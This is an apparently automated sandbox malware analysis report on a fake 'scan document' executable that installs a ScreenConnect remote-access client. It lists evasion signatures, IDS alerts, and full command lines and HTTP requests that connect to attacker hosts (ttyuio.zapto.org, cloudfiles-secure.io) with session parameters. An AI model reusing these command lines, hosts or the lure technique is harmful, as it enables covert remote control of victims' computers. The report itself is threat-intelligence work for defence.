Edit tour

Windows Analysis Report
Scan_doc_09_16_24_1203.exe

Overview

General Information

Sample name:	Scan_doc_09_16_24_1203.exe
Analysis ID:	1523875
MD5:	0753315cbf45a34d4402e7b04a17fddf
SHA1:	5fe769171802694bb13fd3388065c111c8740beb
SHA256:	96cda11b1a4aabf9b2f7695a8b9a87aaa6ff6ae9f2748d89fe7bba2a393703f7
Tags:	exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool

Score:	66
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	33
Range:	0 - 100

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to hide user accounts

Creates files in the system32 config directory

Enables network access during safeboot for specific services

Initial sample is a PE file and has a suspicious name

Reads the Security eventlog

Reads the System eventlog

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

One or more processes crash

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64

Scan_doc_09_16_24_1203.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe" MD5: 0753315CBF45A34D4402E7B04A17FDDF)

dfsvc.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)

ScreenConnect.WindowsClient.exe (PID: 7416 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)

ScreenConnect.ClientService.exe (PID: 7452 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

WerFault.exe (PID: 1136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 2484 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 2916 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 2596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ScreenConnect.ClientService.exe (PID: 7476 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

ScreenConnect.WindowsClient.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "d21d76fd-518c-4e0e-8974-ad827e70c72a" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)

ScreenConnect.WindowsClient.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "ebaebc1a-63a2-4828-be16-c29c94055c3f" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: dfsvc.exe PID: 6176	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7416	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.ClientService.exe PID: 7452	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.0.ScreenConnect.WindowsClient.exe.100000.0.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Sigma Signatures

System Summary

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Source: Network Connection

Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49731, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6176, Protocol: tcp, SourceIp: 178.215.236.119, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 2484, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-02T06:16:27.400359+0200	2009897	1	A Network Trojan was detected	178.215.236.119	443	192.168.2.4	49747	TCP
2024-10-02T06:16:28.527421+0200	2009897	1	A Network Trojan was detected	178.215.236.119	443	192.168.2.4	49749	TCP
2024-10-02T06:16:32.632868+0200	2009897	1	A Network Trojan was detected	178.215.236.119	443	192.168.2.4	49753	TCP
2024-10-02T06:16:33.732202+0200	2009897	1	A Network Trojan was detected	178.215.236.119	443	192.168.2.4	49754	TCP
2024-10-02T06:16:35.195398+0200	2009897	1	A Network Trojan was detected	178.215.236.119	443	192.168.2.4	49755	TCP
2024-10-02T06:16:36.308287+0200	2009897	1	A Network Trojan was detected	178.215.236.119	443	192.168.2.4	49758	TCP
2024-10-02T06:16:38.610321+0200	2009897	1	A Network Trojan was detected	178.215.236.119	443	192.168.2.4	49761	TCP
2024-10-02T06:16:40.355840+0200	2009897	1	A Network Trojan was detected	178.215.236.119	443	192.168.2.4	49762	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Scan_doc_09_16_24_1203.exe	ReversingLabs: Detection: 15%
Source: Scan_doc_09_16_24_1203.exe	Virustotal: Detection: 13%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 89.2% probability

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe

Code function: 0_2_005E1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,

0_2_005E1000

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior

Uses 32bit PE files

Source: Scan_doc_09_16_24_1203.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: Scan_doc_09_16_24_1203.exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 178.215.236.119:443 -> 192.168.2.4:49731 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Scan_doc_09_16_24_1203.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2619140064.000002618066B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180244000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966710075.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Scan_doc_09_16_24_1203.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180667000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180240000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1963256182.0000000003322000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2960868072.0000000003321000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020718098.0000000002DF0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1959458553.0000000000C1D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180663000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180663000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618023C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2619140064.000002618066B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.0000026180244000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966710075.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2619140064.0000026180234000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1963598655.00000000057A2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

Spreading

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49747
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 178.215.236.119:443 -> 192.168.2.4:49754

Enables network access during safeboot for specific services

Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe

Registry value created: NULL Service

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49766 -> 178.215.236.119:8041

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 178.215.236.119 178.215.236.119

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LVLT-10753US LVLT-10753US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzipConnection: Keep-Alive
